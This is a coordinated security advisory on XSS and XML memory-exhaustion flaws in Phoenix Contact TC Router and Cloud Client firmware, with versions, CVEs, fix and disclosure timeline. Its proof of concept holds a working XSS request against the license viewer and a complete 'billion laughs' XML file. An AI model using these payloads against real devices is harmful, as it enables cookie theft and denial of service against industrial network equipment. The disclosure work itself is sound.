Headline
Phoenix Contact TC Cloud / TC Router 2.x XSS / Memory Consumption
Phoenix Contact TC Router 3002T-4G* versions prior to 2.0.2, TC Cloud Client 1002-4G* versions prior to 2.07.2, and Cloud Client 1101T-TX/TX versions prior to 2.06.10 suffer from cross site scripting and memory consumption vulnerabilities.
St. Pölten UAS------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Phoenix Contact TC Cloud Client 1002-4G*, | TC Router 3002T-4G, Cloud Client 1101T-TX/TX vulnerable version| <2.07.2, <2.07.2, <2.06.10 fixed version| 2.07.2, 2.07.2, 2.06.10 CVE number| CVE-2023-3526, CVE-2023-3569 impact| Medium homepage| https://www.phoenixcontact.com/ found| 2023-05-04 by| A. Resanovic, S. Stockinger, T. Etzenberger | This vulnerability was discovery during research at | St. Pölten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"At Phoenix Contact, our approach is innovative, sustainable, and based onpartnership. This applies to how we deal with employees as well as with ourcustomers. We are also conscious of our social and environmental responsibilityand we act accordingly. With the vision of the All Electric Society, we alsowant to empower our customers to act more sustainably by enabling thecomprehensive electrification, networking, and automation of all sectors of theeconomy and infrastructure with our products and solutions."Source: https://www.phoenixcontact.com/en-us/ueber-unsVulnerable versions-------------------------------------------------------------------------------TC Router 3002T-4G* / <2.0.2TC Cloud Client 1002-4G* / <2.07.2Cloud Client 1101T-TX/TX / <2.06.10Vulnerability overview-------------------------------------------------------------------------------1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526A reflected cross-site scripting vulnerability can be triggerd in the licenseviewer of the device. This can be used to execute malicious code in the contextof a user's browser. Cookies may be also stoled via this way.2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569By abusing the configuration file upload functionality of the device, it ispossible to slow down all other processes.Proof of Concept-------------------------------------------------------------------------------1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526The reflected cross-site scripting vulnerability can be triggered by using thefollowing GET request:https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569The following configuration file can be used to exploit the binary"/usr/bin/xmlconfig", which supportes entity reference nodes:===============================================================================<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>===============================================================================The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Update to the latest available firmware version.Workaround-------------------------------------------------------------------------------None.Recommendation-------------------------------------------------------------------------------Phoenix Contact customers are advised to upgrade the firware to the latestavailable version.Contact Timeline-------------------------------------------------------------------------------2023-05-16: Contacting vendor via [email protected]: Vendor informed internal product team.2023-05-18: Added responsible disclosure policy from St. Poelten UAS.2023-05-19: Vendor needs more time to fix the issues.2023-06-15: Vendor asked for an explaination of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor. Offered an MS Teams call to clarify the issues.2023-06-16: Scheduled a call for 2023-06-19.2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.2023-07-13: Received CVE numbers from vendor.2023-07-18: Received firmware versions from vendor.2023-07-23:_Vendor released firmwares.2023-08-08: Coordinated release of security advisory.Web: https://www.fhstp.ac.at/Twitter: https://twitter.com/fh_stpoeltenMail: mis at fhstp dot ac dot atEOF T. Weber / @2023
Related news
CVE-2023-3569: VDE-2023-017 | CERT@VDE
In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an authenticated remote attacker with admin privileges could upload a crafted XML file which causes a denial-of-service.